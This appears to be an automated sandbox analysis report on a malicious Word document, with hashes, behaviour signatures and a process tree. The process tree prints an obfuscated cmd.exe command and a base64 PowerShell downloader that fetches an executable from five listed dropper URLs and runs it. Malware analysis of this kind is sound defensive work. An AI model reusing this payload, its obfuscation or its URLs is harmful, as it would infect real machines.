Analysis

  • max time kernel
    140s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 10:53

General

  • Target

    JHL_D_3392853_28_08_2018.doc

  • Size

    83KB

  • MD5

    e4625136904c387f83100ce9861b2e21

  • SHA1

    3b29428a6cea904abd2903d5623fd7094914fec6

  • SHA256

    8db36a2bb5a769e6d5f1598734a7f26fcabed65197a0463a3ff1cc1486953d3c

  • SHA512

    191b87540c3f9d8ae06dd0532e22dafab46f2ab247a682f40f1a5a7bbdaa5e3b14e900a9195ef1077421695f9dfa3525d3a2b950a4eece65ad9200d0b4eebd9d

  • SSDEEP

    1536:JptJlmrJpmxlRw99NBO+aA7IrlnKchqXN076KC0It4oC:3te2dw99fx2vR1It4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://aliu-rdc.org/QwWKYJxM

exe.dropper

http://2idiotsandnobusinessplan.com/wC7

exe.dropper

http://7naturalessences.com/DFaSvtrS

exe.dropper

http://benimdunyamkres.com/v0vig1G1

exe.dropper

http://hostmktar.com/mP

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\JHL_D_3392853_28_08_2018.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3508
    • C:\Windows\SYSTEM32\CMd.exe
      CMd /v/r " ^sE^T ^ ^h^q^x==^=^A^Ag^AA^I^AACA^g^AA^IAAC^A^g^AAIAAC^A^gA^A^I^A^ACAg^AA^I^AACAgA^AI^A^0^H^A9Bw^e^Ag^G^AjBA^dAEGA^jBQf^As^D^ArB^QYA^UG^Ay^B^g^Y^As^D^A^O^B^wQ^A^Y^E^A^k^AAI^A0GA^lB^A^d^A^k^EAt^AQZ^AsGAvB^g^d^A^4G^AJ^Bw^OA^kC^AOBw^QAYEA^kAA^IAwCATB^Aa^AY^E^A^k^AAK^AUG^A^s^B^QaAYE^AkBQ^YA8^G^As^BgbAcHAv^B^AR^A^4C^A^y^BQ^Q^A^o^G^AkAweA^kH^A^y^B^A^dA^s^HAp^A^gT^A8^GA^GB^AJA^ACA^uBQ^a^A^ACATBAa^AYE^A^k^A^A^KAgG^A^jB^QYA^UG^AyBwbAY^GA^7^A^wJA^U^G^A4^B^QZA^4CAn^AwKAYGA2^B^A^U^A^QC^ArAwJ^Aw^FAn^A^wK^A^M^GA^pBA^b^A^I^G^A1B^AcAoD^A^2^Bg^b^A^U^GA^kAQPA4E^AD^B^gR^AQCA^7Aw^J^A^ADA^x^A^wN^AcCA^g^A^Q^P^A^ACAmBg^dAA^F^A^k^AwO^A^kC^AnAA^QAcCAoA^Ad^AkG^A^sBAc^AMFA^u^Aw^JAAF^A^t^B^wL^A0GAv^Bw^YA^4CAyBQ^YAQHAr^B^Q^bA^Q^HAzB^w^bAg^GAvAw^LA^o^DA^w^B^AdA^QHA^o^BAQAED^A^HBQM^AcGAp^Bgd^A^A^DA2^BwL^A0^GAvB^w^Y^A4C^AzBQZ^AI^HArB^Q^bA^EGA^5B^g^b^A^UH^Ak^BQb^Ak^GAuBQ^ZA^I^G^Av^AwL^A^oD^A^w^BAdA^Q^H^A^o^BAQ^A^MF^AyB^A^dA^YH^ATBQY^A^YE^AE^B^wLA^0^G^AvBw^Y^A^4C^Az^BQ^ZAMGAu^B^Q^Z^AMH^AzB^Q^ZAw^G^A^h^Bgc^A^UH^A0B^QYA4^GA^3Aw^L^A8CA6A^Ac^AQ^H^A0^B^A^a^AA^E^A3^A^wQ^AcH^AvAQ^b^A^8^G^A^j^B^g^LA4^G^AhBAb^AA^H^A^z^B^wc^A^U^GA^uB^Qa^A^MHA1B^g^YA^8G^A^uBA^ZA4G^Ah^B^wc^A^QHAvB^Qa^AQ^GA^p^B^g^M^A^8CAv^A^g^O^AAHA0BA^d^A^gG^A^ABQ^T^AgHA^KB^QW^A^sEAX^Bwd^A^EF^Av^A^wZ^A^I^H^AvB^g^LAM^GA^k^BgcA0C^A1B^Q^a^A^wG^A^h^B^w^L^A^8C^A^6^AAcA^QHA^0^BA^a^AcCA9^A^g^T^A^8^G^AG^B^A^J^AsD^A^0BgbA^U^G^Ap^BAb^AM^EAi^BQ^Z^AcFAu^A^AdAU^GA^O^BAIA^QH^A^j^BQZ^A^o^GAi^B^w^bA^0C^A^3BQZA^4^GA^9A^gc^AEEAqB^AJ ^e- ^l^le^h^sr^ewop& ^F^Or /^l %^Y ^In (^ ^9^8^9^ ^ ^ ^-^1 ^0)D^O ^s^E^t u^j^L^a=!u^j^L^a!!^h^q^x:~%^Y, 1!&^iF %^Y == ^0 CA^L^L %u^j^L^a:~^-^99^0% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e JABqAEEAcgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABGAG8ATgA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAaQB1AC0AcgBkAGMALgBvAHIAZwAvAFEAdwBXAEsAWQBKAHgATQBAAGgAdAB0AHAAOgAvAC8AMgBpAGQAaQBvAHQAcwBhAG4AZABuAG8AYgB1AHMAaQBuAGUAcwBzAHAAbABhAG4ALgBjAG8AbQAvAHcAQwA3AEAAaAB0AHQAcAA6AC8ALwA3AG4AYQB0AHUAcgBhAGwAZQBzAHMAZQBuAGMAZQBzAC4AYwBvAG0ALwBEAEYAYQBTAHYAdAByAFMAQABoAHQAdABwADoALwAvAGIAZQBuAGkAbQBkAHUAbgB5AGEAbQBrAHIAZQBzAC4AYwBvAG0ALwB2ADAAdgBpAGcAMQBHADEAQABoAHQAdABwADoALwAvAGgAbwBzAHQAbQBrAHQAYQByAC4AYwBvAG0ALwBtAFAAJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFAAdgBmACAAPQAgACcANwAxADAAJwA7ACQARgBDAE4APQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAUAB2AGYAKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAaABTACAAaQBuACAAJABGAG8ATgApAHsAdAByAHkAewAkAGoAQQByAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEYAaABTACwAIAAkAEYAQwBOACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEYAQwBOADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4380
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:3436

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_alttsyfi.1e5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Public\710.exe

      Filesize

      7KB

      MD5

      b8c6ad4b788e720c6b7b4fab70b81ad4

      SHA1

      d0eba959434bd8dd359701789cf577b52f448be0

      SHA256

      925d31f83e732cea00ab6bccd98966ca16496864f65936b187a908b822594a15

      SHA512

      649a5d44c4307d2379c1c85352972c7013c7f720cec475b3e7a2a48ec513bb1c1bcd7a1021bd3c3fb46db2ab5dec0eddf9416ef92a63fb56dc586f5a897e5d6a

    • memory/3508-27-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-80-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-0-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-5-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-7-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-8-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-6-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-9-0x00007FFE89080000-0x00007FFE89090000-memory.dmp

      Filesize

      64KB

    • memory/3508-11-0x00007FFE89080000-0x00007FFE89090000-memory.dmp

      Filesize

      64KB

    • memory/3508-1-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-4-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-3-0x00007FFECB84D000-0x00007FFECB84E000-memory.dmp

      Filesize

      4KB

    • memory/3508-26-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-28-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-2-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-55-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-56-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-57-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-76-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-77-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-79-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-78-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/4380-38-0x0000022573D40000-0x0000022573D62000-memory.dmp

      Filesize

      136KB